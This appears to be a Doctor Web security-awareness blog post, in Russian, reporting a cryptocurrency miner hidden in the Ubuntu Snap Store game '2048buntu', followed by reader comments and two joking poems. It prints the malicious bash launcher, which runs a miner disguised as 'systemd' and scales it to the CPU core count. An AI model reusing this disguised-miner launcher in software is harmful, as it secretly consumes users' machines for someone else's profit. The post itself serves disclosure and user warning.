«Моя первая Ferrari»
25 мая 2018
Энкодеры для Linux – не новость; чего уж там, мы же первый и нашли. Майнеры для «линуксов» тоже известны – обычные, не вредоносные. Но было бы странно, если бы на волне популярности злоумышленники не попытались немного подзаработать за счет простых пользователей этой операционной системы.
В популярном дистрибутиве Ubuntu с недавних пор появился новый формат приложений – snap-пакет. Соответственно, появился и официальный магазин, наподобие Windows Store и прочих. И все это – чтобы пользователю было проще работать с системой. Вот только проверять приложения, добавляемые в магазин, никто не собирался.
Бдительный пользователь обнаружил в коде игрушки майнер криптовалют и скрипт, прописывающий автоматический запуск этого майнера.
Открытый код – хорошая штука, можно сразу увидеть все вредоносные планы приложения. А выглядят они примерно так:
#!/bin/bash
currency=bcn
name=2048buntu
{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))
if (( $cores < 4 )); then
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}
https://github.com/canonical-websites/snapcraft.io/issues/651
Вот только почему-то никто этого не замечал. Мало того, подобные майнеры и скрипты оказались и в других приложениях того же автора. Вредоносный код добывал криптовалюту для пользователя с адресом, который по-русски звучит как «моя первая Ferrari». Счётчика скачиваний или установок в Ubuntu Snap Store нет, поэтому узнать, успел ли вирусописатель накопить на машину мечты, доподлинно неизвестно.
#Linux #игры #майнингАнтивирусная правДА! рекомендует
- Используя Linux, не теряйте бдительности. Даже то, что исходники ПО с открытым кодом может проверить каждый, совершенно не означает, что этот «каждый» что-то проверяет. Зачастую, как показывает практика, каждый надеется на кого-то другого, в то время как вредоносный код или опасная уязвимость распространяется на множество рабочих станций и серверов.
- Либо проверяйте код каждой программы, которую собираетесь скачать и установить, либо используйте антивирус. Не ждите милости с неба!
Нам важно ваше мнение
Чтобы оставить комментарий, нужно зайти через свой аккаунт на сайте «Доктор Веб». Если аккаунта еще нет, его можно создать.
Комментарии пользователей
Денисенко Павел Андреевич
13:02:59 2018-08-03
Сергей
20:04:03 2018-05-28
anatol
19:04:09 2018-05-28
З...ч
18:44:06 2018-05-28
razgen
16:07:38 2018-05-28
МЕДВЕДЬ
14:49:39 2018-05-28
Константин
20:55:54 2018-05-26
zsergey
17:01:09 2018-05-26
Lia00
23:36:10 2018-05-25
Littlefish
23:24:46 2018-05-25
Littlefish
23:14:57 2018-05-25
Littlefish
23:11:32 2018-05-25
В...а
22:59:46 2018-05-25
НинаК
22:41:22 2018-05-25
vla_va
22:36:18 2018-05-25
I23
22:32:32 2018-05-25
Lenba
22:28:05 2018-05-25
Zserg
22:16:25 2018-05-25
Владимир
22:06:31 2018-05-25
Dvakota
21:59:25 2018-05-25
Альфа
21:56:33 2018-05-25
Andromeda
21:46:33 2018-05-25
Шалтай Александр Болтай
21:44:34 2018-05-25
duduka
21:42:28 2018-05-25
Геральт
21:37:42 2018-05-25
orw_mikle
21:18:27 2018-05-25
anatol
21:17:25 2018-05-25
marisha-san
16:28:41 2018-05-25
La folle
16:22:48 2018-05-25
Toma
15:41:01 2018-05-25
Damir
15:07:36 2018-05-25
Дмитрий
15:00:33 2018-05-25
znamy
14:28:33 2018-05-25
Masha
14:26:19 2018-05-25
vinnetou
14:04:59 2018-05-25
L1t1um
13:44:59 2018-05-25
robot
13:34:37 2018-05-25
Татьяна
13:28:52 2018-05-25
ArtemiyKurs
13:12:30 2018-05-25
B0RIS
12:59:11 2018-05-25
sanek-xf
12:56:49 2018-05-25
Alexander
12:34:08 2018-05-25
Код нам открыли, - на шею присели.
Не ждите милостей, они уже с вами,
Эти милые чьи-то Ferrari.
Система прекрасна, спора тут нет,
И майнеру нравится, шлет нам привет.
Как гостя незваного не допустить? -
Вебером надо его укротить!
Привратник толковый,
Внимательный, скорый,
И встретит он, и просветит,
Допустит или удалит,
Иль вытолкнет без спора.
Biggurza
12:16:46 2018-05-25
Друзья, всем спасибо за поздравления, всех благодарю, всех ценю, всех обнимаю!
Рад быть и оставаться активным участником проекта.
К сегодняшнему выпуску:
Мечта: Феррари – нет проблем!
Лишь заработать кучу бабок,
И вот, ты мчишься по ухабам,
Рукою машешь – всем привет!
А коли в код прошил майнёр,
И юзерам софтину скинул,
То не робщи – на половину
Уж ты в колонии, пижон.
И юзерам немного быть
С софтом внимательнее. Строго,
Паук научит, хоть немного,
Средь козней майнера прожить.
maestro431
12:13:12 2018-05-25
Неуёмный Обыватель
12:01:29 2018-05-25
I46
11:34:58 2018-05-25
Ruslan
11:25:30 2018-05-25
EvgenyZ
11:04:51 2018-05-25
Самуил Христианин
10:45:12 2018-05-25
Natalya_2017
10:38:31 2018-05-25
Деньги,деньги... Никогда и никому они не дают покоя..